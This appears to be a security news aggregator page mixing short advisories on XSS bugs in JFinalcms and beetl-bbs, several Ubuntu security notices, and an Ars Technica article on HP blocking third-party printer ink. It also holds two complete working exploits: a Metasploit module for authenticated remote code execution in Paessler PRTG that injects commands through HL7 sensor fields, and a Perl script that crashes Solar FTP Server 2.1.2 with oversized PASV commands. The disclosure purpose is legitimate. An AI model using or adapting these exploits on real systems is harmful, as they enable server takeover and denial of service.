Cross Site Scripting (XSS) vulnerability in /admin/login password parameter in JFinalcms 5.0.0 allows attackers to run arbitrary code via crafted URL.

**Cross-site Scripting in JFinal**

Moderate severity GitHub Reviewed Published Jan 23, 2024 to the GitHub Advisory Database • Updated Jan 24, 2024

GHSA-qh2w-9m7w-hjg2: Cross-site Scripting in JFinal

The company says it wants to protect you from “viruses.” Experts are skeptical.

Last Thursday, HP CEO Enrique Lores addressed the company's controversial practice of bricking printers when users load them with third-party ink. Speaking to CNBC Television, he said, "We have seen that you can embed viruses in the cartridges. Through the cartridge, \[the virus can\] go to the printer, \[and then\] from the printer, go to the network."

That frightening scenario could help explain why HP, which was hit this month with another lawsuit over its Dynamic Security system, insists on deploying it to printers.

To investigate, I turned to Ars Technica senior security editor Dan Goodin. He told me that he didn't know of any attacks actively used in the wild that are capable of using a cartridge to infect a printer.

Goodin also put the question to Mastodon, and cybersecurity professionals, many with expertise in embedded-device hacking, were decidedly skeptical.

HP’s Evidence

Unsurprisingly, Lores' claim comes from HP-backed research. The company's bug bounty program tasked researchers from Bugcrowd with determining if it's possible to use an ink cartridge as a cyberthreat. HP argued that ink cartridge microcontroller chips, which are used to communicate with the printer, could be an entryway for attacks.

As detailed in a 2022 article from research firm Actionable Intelligence, a researcher in the program found a way to hack a printer via a third-party ink cartridge. The researcher was reportedly unable to perform the same hack with an HP cartridge.

Shivaun Albright, HP's chief technologist of print security, said at the time:

> A researcher found a vulnerability over the serial interface between the cartridge and the printer. Essentially, they found a buffer overflow. That’s where you have got an interface that you may not have tested or validated well enough, and the hacker was able to overflow into memory beyond the bounds of that particular buffer. And that gives them the ability to inject code into the device.

Albright added that the malware “remained on the printer in memory” after the cartridge was removed.

HP acknowledges that there's no evidence of such a hack occurring in the wild. Still, because chips used in third-party ink cartridges are reprogrammable (their “code can be modified via a resetting tool right in the field,” according to Actionable Intelligence), they’re less secure, the company says. The chips are said to be programmable so that they can still work in printers after firmware updates.

HP also questions the security of third-party ink companies' supply chains, especially compared to its own supply chain security, which is ISO/IEC-certified.

So HP did find a theoretical way for cartridges to be hacked, and it's reasonable for the company to issue a bug bounty to identify such a risk. But its solution for this threat was announced _before_ it showed there could be a threat. HP added ink cartridge security training to its bug bounty program in 2020, and the above research was released in 2022. HP started using Dynamic Security in 2016, ostensibly to solve the problem that it sought to prove exists years later.

Further, there's a sense from cybersecurity professionals that Ars spoke with that even if such a threat exists, it would take a high level of resources and skills, which are usually reserved for targeting high-profile victims. Realistically, the vast majority of individual consumers and businesses shouldn't have serious concerns about ink cartridges being used to hack their machines.

Whose Job Is It to Make HP Printers Secure?

With Dynamic Security, HP claims to be providing a response to cyberthreats against ink cartridges. But its response is to inconvenience customers rather than beef up HP printers to be invulnerable to remote code execution via ink cartridges.

In response to Bugcrowd's research, HP issued a security update in 2022. Despite this, Albright claimed at the time that it still wasn’t safe for customers to use third-party ink because HP could “never guarantee that every interface with a non-HP cartridge on our device will be free of bugs and security vulnerabilities.”

Even if it's theoretically possible for hackers to leverage ink cartridges, it's a minimal concern, and there are far more pressing security threats to printers than third-party ink. Many easier ways exist for a diligent hacker to get into a printer user's network, including by exploiting unfixed software vulnerabilities.

Further, with HP firmware updates becoming associated with printers suddenly not working, we've seen reports of users avoiding printer updates and encouraging others to do the same, which could result in users rejecting important security updates.

An HP spokesperson declined to comment on these matters.

The Real Focus: Protecting IP

Lores' initial response to CNBC Television's question about the lawsuit may be telling. The CEO responded to dictated consumer complaints by highlighting HP's own needs:

> It's important to protect our IP. There is a lot of IP that we build in the inks of the printers, in the printers themselves ... And what we’re doing is, when we identify cartridges that are violating our IP, we stop the printer from work\[ing\].

When HP first announced Dynamic Security in 2016, it claimed that the feature would deliver "the best consumer experience" and protect customers from cartridges "that infringe on our IP." Eight years and several abrupt firmware updates later, the former seems like it has taken a backseat to the latter.

Lores told CNBC Television that non-HP ink can create "all sort\[s\] of issues," saying that printers may stop working if a customer uses ink that is not "designed" to work with HP printers.

Of course, third-party ink manufacturers would have you believe that their ink is meant to work with the printer brands on its products' boxes. But depending on the quality of the product, you might find inconsistent results with third-party ink cartridges.

While brand recognition and reliability could be good reasons for someone to opt for an HP-brand cartridge over a third party's, such decisions are typically left to customers, not forced via firmware updates. Companies like HP can expect to be rewarded for superior products, support, and warranties, but customers who would rather risk quality to save money would prefer to have options.

HP Wants Printing to Be a Subscription

It's clear that HP's tactics are meant to coax HP printer owners into committing to HP ink, which helps the company drive recurring revenue and makes up for money lost when the printers are sold. Lores confirmed in his interview that HP loses money when it sells a printer and makes money through supplies.

But HP's ambitions don't end there. It envisions a world where all of its printer customers also subscribe to an HP program offering ink and other printer-related services. "Our long-term objective is to make printing a subscription. This is really what we have been driving," Lores said.

HP has been largely focused on pushing its monthly ink subscription program, Instant Ink, over the years. In December, HP CFO Marie Myers noted that subscription models like Instant Ink can bring "20 percent uplift on the value of that customer because you're locking that person" in. In its most recent financial report, HP named Instant Ink one of its "key growth areas."

When asked about concerns that HP is driving up the price of printer ink, Lores told CNBC Television, "This is part of the business model that has been developed over time," noting that HP printer boxes disclose which printers use Dynamic Security. HP's website also notes which printers use Dynamic Security.

But even if you have that information, it's unclear whether an HP printer will immediately work with third-party ink. HP sells printers that work with third-party ink now, but the company says it may update them in the future to "block cartridges using a non-HP chip or modified or non-HP circuitry from working in the printer, including cartridges that work today."

Who’s Investing in Whom?

HP has faced numerous lawsuits in relation to blocking device functionality due to third-party ink and has paid out millions as a result. So why is it still continuing down this road? That might be partially explained by the company's perspective on the vendor-customer relationship.

When people buy an HP printer, they consider it an investment. But HP thinks that when you buy a printer, the company is investing in you.

As Lores put it:

> This is something we announced a few years ago that our goal was to reduce the number of what we call unprofitable customers. Because every time a customer buys a printer, it's an investment for us. We're investing \[in\] that customer, and if this customer doesn’t print enough or doesn’t use our supplies, it’s a bad investment.

HP expects customers who already gave it money for a printer to continue paying the company for years. HP customers expect their purchase to pay off in the long term without stipulations on ink branding. If HP can't find a way to make printer customers feel like their purchase is a benefit rather than a commitment to giving HP money regularly, people may eventually stop thinking that HP printers are a worthy investment.

When reached for comment, an HP spokesperson told Ars, in part, that HP "offers a wide range of printing products and solutions for customers to choose from, including Instant Ink" and "regularly" expands its offerings "to create more value" for customers.

You can watch CNBC Television's interview below:

_This story originally appeared on_ _Ars Technica._

HP CEO Says They Brick Printers That Use Third-Party Ink Because of … Hackers

Cross Site Scripting (XSS) vulnerability in JFinalcms 5.0.0 allows attackers to run arbitrary code via the /admin/login username parameter.

**Cross-site Scripting in JFinal**

Moderate severity GitHub Reviewed Published Jan 23, 2024 to the GitHub Advisory Database • Updated Jan 23, 2024

GHSA-v435-pfj6-68r3: Cross-site Scripting in JFinal

Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the /index keyword parameter.

**Cross-site Scripting in beetl-bbs**

Moderate severity GitHub Reviewed Published Jan 23, 2024 to the GitHub Advisory Database • Updated Jan 23, 2024

GHSA-v9wr-2xrg-v7w8: Cross-site Scripting in beetl-bbs

Ubuntu Security Notice 6595-1 - It was discovered that PyCryptodome had a timing side-channel when performing OAEP decryption. A remote attacker could possibly use this issue to recover sensitive information.

    ==========================================================================Ubuntu Security Notice USN-6595-1January 23, 2024pycryptodome vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:PyCryptodome could be made to expose sensitive information.Software Description:- pycryptodome: Cryptographic Python libraryDetails:It was discovered that PyCryptodome had a timing side-channel whenperforming OAEP decryption. A remote attacker could possibly use this issueto recover sensitive information.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   python3-pycryptodome            3.11.0+dfsg1-3ubuntu0.1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6595-1   CVE-2023-52323Package Information:   https://launchpad.net/ubuntu/+source/pycryptodome/3.11.0+dfsg1-3ubuntu0.1

Ubuntu Security Notice USN-6595-1

Ubuntu Security Notice 6594-1 - Joshua Rogers discovered that Squid incorrectly handled HTTP message processing. A remote attacker could possibly use this issue to cause Squid to crash, resulting in a denial of service. Joshua Rogers discovered that Squid incorrectly handled Helper process management. A remote attacker could possibly use this issue to cause Squid to crash, resulting in a denial of service. Joshua Rogers discovered that Squid incorrectly handled HTTP request parsing. A remote attacker could possibly use this issue to cause Squid to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6594-1  
January 23, 2024

squid vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Squid.

Software Description:  
- squid: Web proxy cache server

Details:

Joshua Rogers discovered that Squid incorrectly handled HTTP message  
processing. A remote attacker could possibly use this issue to cause  
Squid to crash, resulting in a denial of service. (CVE-2023-49285)

Joshua Rogers discovered that Squid incorrectly handled Helper process  
management. A remote attacker could possibly use this issue to cause  
Squid to crash, resulting in a denial of service. (CVE-2023-49286)

Joshua Rogers discovered that Squid incorrectly handled HTTP request  
parsing. A remote attacker could possibly use this issue to cause  
Squid to crash, resulting in a denial of service. (CVE-2023-50269)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   squid                           6.1-2ubuntu1.2

Ubuntu 23.04:  
   squid                           5.7-1ubuntu3.2

Ubuntu 22.04 LTS:  
   squid                           5.7-0ubuntu0.22.04.3

Ubuntu 20.04 LTS:  
   squid                           4.10-1ubuntu1.9

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6594-1  
   CVE-2023-49285, CVE-2023-49286, CVE-2023-50269

Package Information:  
   https://launchpad.net/ubuntu/+source/squid/6.1-2ubuntu1.2  
   https://launchpad.net/ubuntu/+source/squid/5.7-1ubuntu3.2  
   https://launchpad.net/ubuntu/+source/squid/5.7-0ubuntu0.22.04.3  
   https://launchpad.net/ubuntu/+source/squid/4.10-1ubuntu1.9

Ubuntu Security Notice USN-6594-1

Ubuntu Security Notice 6593-1 - It was discovered that GnuTLS had a timing side-channel when processing malformed ciphertexts in RSA-PSK ClientKeyExchange. A remote attacker could possibly use this issue to recover sensitive information. It was discovered that GnuTLS incorrectly handled certain certificate chains with a cross-signing loop. A remote attacker could possibly use this issue to cause GnuTLS to crash, resulting in a denial of service. This issue only affected Ubuntu 22.04 LTS, Ubuntu 23.04, and Ubuntu 23.10.

==========================================================================  
Ubuntu Security Notice USN-6593-1  
January 22, 2024

gnutls28 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in GnuTLS.

Software Description:  
- gnutls28: GNU TLS library

Details:

It was discovered that GnuTLS had a timing side-channel when processing  
malformed ciphertexts in RSA-PSK ClientKeyExchange. A remote attacker could  
possibly use this issue to recover sensitive information. (CVE-2024-0553)

It was discovered that GnuTLS incorrectly handled certain certificate  
chains with a cross-signing loop. A remote attacker could possibly use this  
issue to cause GnuTLS to crash, resulting in a denial of service. This  
issue only affected Ubuntu 22.04 LTS, Ubuntu 23.04, and Ubuntu 23.10.  
(CVE-2024-0567)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libgnutls30                     3.8.1-4ubuntu1.2

Ubuntu 23.04:  
   libgnutls30                     3.7.8-5ubuntu1.2

Ubuntu 22.04 LTS:  
   libgnutls30                     3.7.3-4ubuntu1.4

Ubuntu 20.04 LTS:  
   libgnutls30                     3.6.13-2ubuntu1.10

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6593-1  
   CVE-2024-0553, CVE-2024-0567

Package Information:  
   https://launchpad.net/ubuntu/+source/gnutls28/3.8.1-4ubuntu1.2  
   https://launchpad.net/ubuntu/+source/gnutls28/3.7.8-5ubuntu1.2  
   https://launchpad.net/ubuntu/+source/gnutls28/3.7.3-4ubuntu1.4  
   https://launchpad.net/ubuntu/+source/gnutls28/3.6.13-2ubuntu1.10

Ubuntu Security Notice USN-6593-1

Ubuntu Security Notice 6592-1 - It was discovered that libssh incorrectly handled the ProxyCommand and the ProxyJump features. A remote attacker could possibly use this issue to inject malicious code into the command of the features mentioned through the hostname parameter. It was discovered that libssh incorrectly handled return codes when performing message digest operations. A remote attacker could possibly use this issue to cause libssh to crash, obtain sensitive information, or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6592-1  
January 22, 2024

libssh vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in libssh.

Software Description:  
- libssh: A tiny C SSH library

Details:

It was discovered that libssh incorrectly handled the ProxyCommand and the  
ProxyJump features. A remote attacker could possibly use this issue to  
inject malicious code into the command of the features mentioned through  
the hostname parameter. (CVE-2023-6004)

It was discovered that libssh incorrectly handled return codes when  
performing message digest operations. A remote attacker could possibly use  
this issue to cause libssh to crash, obtain sensitive information, or  
execute arbitrary code. (CVE-2023-6918)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libssh-4                        0.10.5-3ubuntu1.2

Ubuntu 23.04:  
   libssh-4                        0.10.4-2ubuntu0.3

Ubuntu 22.04 LTS:  
   libssh-4                        0.9.6-2ubuntu0.22.04.3

Ubuntu 20.04 LTS:  
   libssh-4                        0.9.3-2ubuntu2.5

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6592-1  
   CVE-2023-6004, CVE-2023-6918

Package Information:  
   https://launchpad.net/ubuntu/+source/libssh/0.10.5-3ubuntu1.2  
   https://launchpad.net/ubuntu/+source/libssh/0.10.4-2ubuntu0.3  
   https://launchpad.net/ubuntu/+source/libssh/0.9.6-2ubuntu0.22.04.3  
   https://launchpad.net/ubuntu/+source/libssh/0.9.3-2ubuntu2.5

Ubuntu Security Notice USN-6592-1

This Metasploit module exploits an authenticated remote code execution vulnerability in PRTG.

    class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::Retry  def initialize(info = {})    super(      update_info(        info,        'Name' => 'PRTG CVE-2023-32781 Authenticated RCE',        'Description' => %q{          Authenticated RCE in Paessler PRTG        },        'License' => MSF_LICENSE,        'Author' => ['Kevin Joensen <kevin[at]baldur.dk>'],        'References' => [          [ 'URL', 'https://baldur.dk/blog/prtg-rce.html'],          [ 'CVE', '2023-32781']        ],        'DisclosureDate' => '2023-08-09',        'Platform' => 'win',        'Arch' => [ ARCH_X86, ARCH_X64 ],        'Targets' => [          [            'Windows_Fetch',            {              'Arch' => [ ARCH_CMD ],              'Platform' => 'win',              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },              'Type' => :win_fetch            }          ],          [            'Windows_CMDStager',            {              'Arch' => [ ARCH_X64, ARCH_X86 ],              'Platform' => 'win',              'Type' => :win_cmdstager,              'CmdStagerFlavor' => [ 'psh_invokewebrequest' ]            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {},        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new(          'USERNAME',          [ true, 'The username to authenticate with', 'prtgadmin' ]        ),        OptString.new(          'PASSWORD',          [ true, 'The password to authenticate with', 'prtgadmin' ]        ),        OptString.new(          'TARGETURI',          [ true, 'The URI for the PRTG web interface', '/' ]        )      ]    )  end  def check    begin      res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(datastore['URI'], '/index.htm')      })    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError      return CheckCode::Unknown    ensure      disconnect    end    if res && res.code == 200      prtg_server_header = res.headers['Server']      if (prtg_server_header.include? 'PRTG') || (html.to_s.include? 'PRTG')        return CheckCode::Detected      end    end    return CheckCode::Unknown  end  def exploit    @sensors_to_delete = []    connect    case target['Type']    when :win_cmdstager      execute_cmdstager    when :win_fetch      execute_command(payload.encoded)    end  end  def on_new_session(client)    super    @sensors_to_delete.each do |sensor_id|      delete_sensor_by_id(sensor_id)    end    print_good('Session created')  end  def execute_command(cmd, _opts = {})    print_status('Running PRTG RCE exploit')    authenticate_prtg    bat_file_name = write_bat_file_to_disk(cmd)    run_bat_file_from_disk(bat_file_name)    print_status('Exploit done')    handler  end  def authenticate_prtg    print_status('Authenticating against PRTG')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'public', 'checklogin.htm'),      'keep_cookies' => true,      'vars_post' => {        'username' => datastore['USERNAME'],        'password' => datastore['PASSWORD']      }    })    unless res      fail_with(Failure::NoAccess, 'Failure to connect to PRTG')    end    if res && res.code == 302 && res.get_cookies      print_good('Successfully authenticated against PRTG')    else      fail_with(Failure::NoAccess, 'Failure to authenticate against PRTG')    end  end  def get_csrf_token    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'welcome.htm'),      'keep_cookies' => true    })    if res.nil? || res.body.nil?      fail_with(Failure::NoAccess, 'Page with CSRF token not available')    end    regex = /csrf-token" content="([^"]+)"/    token = res.body[regex, 1]    print_status("Extracted csrf token: #{token}")    token  end  def delete_sensor_by_id(sensor_id)    print_status("Deleting sensor #{sensor_id}")    csrf_token = get_csrf_token    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api', 'deleteobject.htm'),      'keep_cookies' => true,      'headers' => {        'anti-csrf-token' => csrf_token,        'X-Requested-With' => 'XMLHttpRequest'      },      'vars_post' => {        id: sensor_id,        approve: 1      }    })    if res.nil? || res.body.nil?      fail_with(Failure::NoAccess, 'Sensor deletion failed')    end  end  def get_created_sensor_id(sensor_name)    print_status('Fetching created sensor id')    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'controls', 'deviceoverview.htm'),      'keep_cookies' => true,      'vars_get' => {        'id' => 40      }    })    if res.nil? || res.body.nil?      fail_with(Failure::NoAccess, 'Page with sensorid not available')    end    regex = /id=([0-9]+)">#{sensor_name}/    sensor_id = res.body[regex, 1]    print_status("Extracted sensor_id: #{sensor_id}")    sensor_id  end  def run_sensor_with_id(sensor_id)    csrf_token = get_csrf_token    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api', 'scannow.htm'),      'keep_cookies' => true,      'headers' => {        'anti-csrf-token' => csrf_token,        'X-Requested-With' => 'XMLHttpRequest'      },      'vars_post' => {        id: sensor_id      }    })    if res && res.code == 200      print_good('Sensor started running')    else      fail_with(Failure::NoAccess, 'Failure to run sensor')    end  end  def write_bat_file_to_disk(cmd)    # Uses the HL7Sensor for writing a .bat file to the disk    cmd = cmd.gsub! '\\', '\\\\\\'    print_status('Writing .bat to disk')    csrf_token = get_csrf_token    # Generate a random sensor name    sensor_name = Rex::Text.rand_text_alphanumeric(8..10)    bat_file_name = "#{Rex::Text.rand_text_alphanumeric(8..10)}.bat"    # Clean up the .bat file    cmd = "#{cmd} & del %0"    print_status("Generated sensor_name #{sensor_name}")    print_status("Generated bat_file_name #{bat_file_name}")    params = {      'name_' => sensor_name,      'parenttags_' => '',      'tags_' => 'dicom hl7',      'priority_' => '3',      'port_' => '104',      'timeout_' => '60',      'override_' => '0',      'sendapp_' => Rex::Text.rand_text_alphanumeric(4..5),      'sendfac_' => Rex::Text.rand_text_alphanumeric(4..5),      'recvapp_' => Rex::Text.rand_text_alphanumeric(4..5),      'recvfac_' => "#{Rex::Text.rand_text_alphanumeric(4..5)}\" -debug=\"..\\Custom Sensors\\EXE\\#{bat_file_name}\" -recvapp=\"#{Rex::Text.rand_text_alphanumeric(4..5)}",      'hl7file_' => "ADT_& #{cmd} & A08.hl7|ADT_A08.hl7||",      'hl7filename' => '',      'intervalgroup' => ['0', '1'],      'interval_' => '60|60 seconds',      'errorintervalsdown_' => '1',      'inherittriggers' => '1',      'id' => '40',      'sensortype' => 'hl7',      'tmpid' => '2',      'anti-csrf-token' => csrf_token    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'addsensor5.htm'),      'keep_cookies' => true,      'vars_post' => params    })    unless res      fail_with(Failure::NoAccess, 'Failure to connect to PRTG')    end    if res && res.code == 302      print_good('HL7 Sensor succesfully created')    else      fail_with(Failure::NoAccess, 'Failure to create HL7 sensor')    end    # Actually creating the sensor can take 1-2 seconds    print_status('Checking for sensor creation')    sensor_id = retry_until_truthy(timeout: 10) do      get_created_sensor_id(sensor_name)    end    print_status('Requesting HL7 Sensor to initiate scan')    run_sensor_with_id(sensor_id)    @sensors_to_delete.push(sensor_id)    print_good('.bat file written to disk')    bat_file_name  end  def run_bat_file_from_disk(bat_file_name)    print_status("Running the .bat file: #{bat_file_name}")    csrf_token = get_csrf_token    sensor_name = Rex::Text.rand_text_alphanumeric(8..10)    params = {      'name_' => sensor_name,      'parenttags_' => '',      'tags_' => 'exesensor',      'priority_' => '3',      'scriptplaceholdergroup' => '1',      'scriptplaceholder1description_' => '',      'scriptplaceholder1_' => '',      'scriptplaceholder2description_' => '',      'scriptplaceholder2_' => '',      'scriptplaceholder3description_' => '',      'scriptplaceholder3_' => '',      'scriptplaceholder4description_' => '',      'scriptplaceholder4_' => '',      'scriptplaceholder5description_' => '',      'scriptplaceholder5_' => '',      'exefile_' => "#{bat_file_name}|#{bat_file_name}||",      'exefilelabel' => '',      'exeparams_' => '',      'environment_' => '0',      'usewindowsauthentication_' => '0',      'mutexname_' => '',      'timeout_' => '60',      'valuetype_' => '0',      'channel_' => 'Value',      'unit_' => '#',      'monitorchange_' => '0',      'writeresult_' => '0',      'intervalgroup' => '0',      'interval_' => '43200|12 hours',      'errorintervalsdown_' => '1',      'inherittriggers' => '1',      'id' => '40',      'sensortype' => 'exe',      'tmpid' => '6',      'anti-csrf-token' => csrf_token    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'addsensor5.htm'),      'keep_cookies' => true,      'vars_post' => params    })    unless res      fail_with(Failure::NoAccess, 'Failure to connect to PRTG')    end    if res && res.code == 302      print_status('EXE Script sensor created')    else      fail_with(Failure::NoAccess, 'Failure to create EXE Script sensor')    end    print_status('Checking for sensor creation')    sensor_id = retry_until_truthy(timeout: 10) do      get_created_sensor_id(sensor_name)    end    run_sensor_with_id(sensor_id)    @sensors_to_delete.push(sensor_id)    print_good('Exploit completed. Waiting for payload')  endend

PRTG Authenticated Remote Code Execution

Solar FTP Server version 2.1.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 23 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1o4xTt67bUJYAAKm0pqNIG99ly--xRQBp/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=U9nH6gqyT88

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The FTP server does not correctly handle the amount of data or bytes sent.  
#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

print "[+] Connecting to $ip:$port\n";  
my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $host:$port\n";

$s->send("USER anon\r\n");  
my $response = <$s>;  
print $response;  
$s->send("PASS anon\r\n");  
$response = <$s>;  
print $response;  
$s->send("SYST\r\n");  
$response = <$s>;  
print $response;  
sleep(2);  
$s->send("PASV " . "\x41"x6631 . "\r\n");  
sleep(3);  
$response = <$s>;  
print $response;  
$response = <$s>;  
print $response;  
print ">>> Sending second payload\n";  
$s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n");  
$response = <$s>;  
print $response;  
sleep(2);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                                                                    #\n";        
      print "#             Solar FTP Server 2.1.2 - PASV - Denied of Service      #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Tag

#vulnerability